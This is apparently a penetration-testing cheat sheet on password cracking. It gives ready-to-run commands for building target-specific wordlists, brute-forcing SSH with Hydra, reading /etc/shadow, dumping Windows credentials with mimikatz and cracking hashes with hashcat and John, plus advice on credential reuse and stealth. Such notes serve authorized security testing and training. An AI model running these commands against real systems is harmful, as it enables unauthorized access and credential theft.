Password Cracking

Default Creds

Building words lists

Use content from webpages to build a dictionary. This can include company pages, Facebook, twitter, and any other resource gathered when doing OSINT on the target. To grab all words from a page, Use Cewl.

Password Manglers:

Building Wordlists:

# Grab words form a site
cewl https://example.com -v --with-numbers -w words.txt

# Password Mangeling, High storage cost for longer lists.
python pydictor.py -extend words.txt --leet 0 1 2 11 21 --level 1 --len 4 16 --occur "<=10" ">0" "<=2" -o /possbile/wordlist.lst

# This will create a multiple GB file. You dont have the storage. 
./rsmangler.rb words.txt -yieulcp

John Custom word lists

# Edit the john.conf to adda new rule
vim /opt/john/john.conf

# Adds a year from 1900 to 2099 followd by a special char to each word
[List.Rules:YearSpecialChar]
Az"19[0-9][0-9]"$[!@#$%^&*]
Az"20[0-9][0-9]"$[!@#$%^&*]

# Build the list 
john --wordlist=words.lst --rules=YearSpecialChar --stdout > withYearAndChar.txt

Brute forcing tools

Burpsuite (intruder): https://portswigger.net/burp
Hydra: https://github.com/vanhauser-thc/thc-hydra

Hydra:

hydra -l <username> -P <LIST> <ip> <Protocol>

when bruteforcing SSH, you need to specify a timing interval:

hydra -l <username> -P <LIST> <ip> ssh -t4

John to crack windows hashdump:

john --format=NT <hashes.txt> --wordlist=<wordlist.txt>
john --show --fromat=LM <hashfile.txt>

John to crack /etc/shadow

# Create a txt file for /etc/passwd and shadow
cp /etc/passwd passwd.txt
cp /etc/shadow shadow.txt

# Unshadow 
unshadow passwd.txt shadow.txt > unshadowed.txt

# Crack with john 
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Windows Hashdump

./mimikatz.exe
privilege::debug
lsadump::lsa /patch

hashcat -m 1000 f4ab68f27303bcb4024650d8fc5f973a rockyou.txt

Cracking NTLMv2-SSP

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Wifi Hacking

# Convert PCAP to hashcat: https://hashcat.net/cap2hashcat/index.pl
hashcat -m 22000 file.hc22000 wordslist.txt

Protocols to target

Protocols: telnet, smtp, http, https, smb, rpc, rdp, pop, sql.

Easy ports to hit: 20-23, 25, 80, 443, 135, 139.

General advice

Specify speed when bruteforcing SSH or you will hit a wall quickly. Using hydra, this is done using the T4 parameter.
Stop after gaining access to one account. Try its creds on everything, and use its creds for further enumeration. Never forget to try sudo -i for easy escalation.
Always take a look around the host machines file system when possible. potential low hanging fruit for enumeration. EX: Local user list at /etc/passwd.
Never crack hashes on target machine. Speed and stealth will be abysmal.
Identify Hash type

PreviousWeaponization NextShell Upgrades

Last updated 3 years ago

hashtagDefault Creds

hashtagBuilding words lists

hashtagJohn Custom word lists

hashtagBrute forcing tools

hashtagWindows Hashdump

hashtagCracking NTLMv2-SSP

hashtagWifi Hacking

hashtagProtocols to target

hashtagGeneral advice